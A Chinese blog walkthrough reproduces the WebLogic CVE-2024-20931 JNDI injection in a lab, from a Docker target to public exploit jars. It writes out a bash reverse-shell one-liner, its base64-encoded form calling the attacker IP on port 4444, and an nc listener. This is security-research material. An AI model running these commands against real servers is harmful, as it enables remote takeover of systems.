首页 > 其他分享 >CVE-2024-20931【复现】

CVE-2024-20931【复现】

时间:2024-03-09 19:45:27浏览次数:34  
标签:20931 jar 2024 JNDI CVE com

漏洞编号:CVE-2024-20931

一、环境准备:

1台Windows主机(10.46.47.227)作为攻击机 | 1台centos虚拟机(192.168.172.172)作为目标机 | 虚拟机网络模式为nat

二、搭建漏洞环境

1、docker拉取镜像

1.1 docker pull ismaleiva90/weblogic12 | 我已先完成(截图丢失),大概4~5g,拉取问题:国内镜像证书失效

解决链接:https://www.cnblogs.com/digdeep/p/12236637.html

2、启动环境

2.1 docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

3、访问网页

3.1 查看虚拟机ip命令:ifconfig

3.2 先在虚拟机中访问192.168.172.172:7001,加/console就是weblogic的控制页面(后半句无用)


3.3 再测试从Windows主机能否访问192.168.172.172::7001

三、利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

工具链接:https://github.com/welk1n/JNDI-Injection-Exploit
(同样需要Java环境)

1、利用该工具反弹shell(需编码)

1.1 在线编码工具:https://ares-x.com/tools/runtime-exec

bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40Ni40Ny4yMjcvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

2、运行JNDI注入工具:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编 码后的反弹Shell命令" -A "攻击机IP"

四、利用CVE-2024-20931.jar工具

工具链接:https://github.com/dinosn/CVE-2024-20931

1、 下载到Windows主机中,Java环境需配置

我的为Java8

2、先检验一下漏洞

java -jar CVE-2024-20931.jar

2.1 从此图

2.2 到此图了,说明存在漏洞,就可以开启监听,nc -lvnp 4444

Windows需自行安装nc
image

3、此时就要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

3.1 填入10.46.47.227:1389/xgec8w

image

3.2 反弹监听成功

image
image

相关链接:https://mp.weixin.qq.com/s/XwQZ6BqWvU72O4XTXOlovg

标签:20931,jar,2024,JNDI,CVE,com
From: https://www.cnblogs.com/fake-stars/p/18057675

相关文章

  • 2024-3-9
    睡一上午觉,下午不想去图书馆了,在寝室半学半玩,主要是写作业,作业太多了今日夜景......
  • [联合省选 2024] 季风
    首先我们不难发现,原题意等价于求最小的\(m\)使得\(|x-\sum_{i=0}^{m-1}x_{i\bmodn}|+|y-\sum_{i=0}^{m-1}y_{i\bmodn}|\lem\cdotk\),因为你可以把较大的\(x'_i,y'_i\)匀出一点给较小的\(x'_i,y'_i\),使得所有\(|x'_i|+|y'_i|\lek\)都满足,而不会影响结果。考虑枚举\(i......
  • pkuwc2024
    牛牛牛啊,可以去省外旅游咯!day0由于神秘原因,很晚才到重庆,但是两个育才老哥非常的热情啊,请我吃了顿饭,嘎嘎舒服。然后也没发生啥,就睡大觉了。day1不愧是山城,走了好一会才到现场,听了会开营仪式,非常的简短,好评!拍了张大合照就去试机了。到场地比较早,偷偷的看了看周围哥们的名字。......
  • SCOI2024
    我曾认为过去的一切大多都不需要记录,写在看来,给未来的自己留下些稚嫩的文字又何尝不是一种美好呢?书接上回,由于CSP爆炸,WC没得打,被迫会老窝上网课。后来大概又去学了些数学,还去参加了省上的集训(天天打乒乓),学了些比较牛的东西,就省选了。由于NOIp的70分劣势加上实力本身的薄......
  • Blog Statistics Apr 1, 2023 - Apr 1, 2024
    1.OverviewDataDate:Apr1,2023-Apr1,2024Numberofarticles:53AllPlatformTotalVisits:1,011,000+(ThesearticeswerealsopublishedatZhihu.com、Toutiao.com、WeChatOfficialAccount、HeapDump、TencentDeveloper.)2.Dataforeachplatformlast......
  • NOIP2024 模拟赛1
    \(2023\)赛年的结束,\(2024\)赛年的开始。我们会继续前行,也永远会。如今走过这世间万般流连翻过岁月不同侧脸措不及防闯入你的笑颜我曾难自拔于世界之大也沉溺于其中梦话不得真假不做挣扎不惧笑话我曾将青春翻涌成她也曾指尖弹出盛夏心之所动且就随缘去吧逆着光......
  • HNOI 2024 (联合省选 2024)游记
    Day-2联考,T2T3一分没得,被Wu_Ren爆了。不详的预感。Day-1世界线分支点:爸问我晚上要不要在操场上跑步?选择:是。虽然就在自家学校考,但是为了让我休息好还是在黄兴广场订了个酒店。虽然在闹市区但是这家酒店很安静?没有什么多余的顾虑,直接睡了,睡得很好。Day1开题,前面忘了......
  • 【联合省选 2024】错题本
    D1T1省流:不会解绝对值不等式直接给我干了60pts。D1T2trie树上的东西不是很熟练。甚至于,考场连部分分都写错了。挂了8ptsD2T2省流:数组不会开大;不会组合数;不会回溯\(k=0\)状压部分,自己写了个\(1\sim2n\)的递推inv,数组只开到16,直接占到了dp数组的空间,挂了10pts......
  • AT_abc 复盘合集(2024)
    AT_abc217复盘A非常水ACcode:#include<bits/stdc++.h>usingnamespacestd;strings1,s2;intmain(){ cin>>s1>>s2; if(s1<s2)cout<<"Yes"; elsecout<<"No"; return0;}B还是非常水,随便拿map搞搞......
  • P10217 [省选联考 2024] 季风题解
    考场上没写出来,火大,实际上这题放校内%你赛我肯定写的出来,可惜这是省选。实际上这题不难,主要是观察性质,接着拆柿子,然后就是有点难写,要写得好看有点考验代码构建能力和数学能力。我们考虑原题的每对\((x,y)\)都要满足\(|x|+|y|\lek\)而我们可以知道后面应该填的\((x,y)\)如......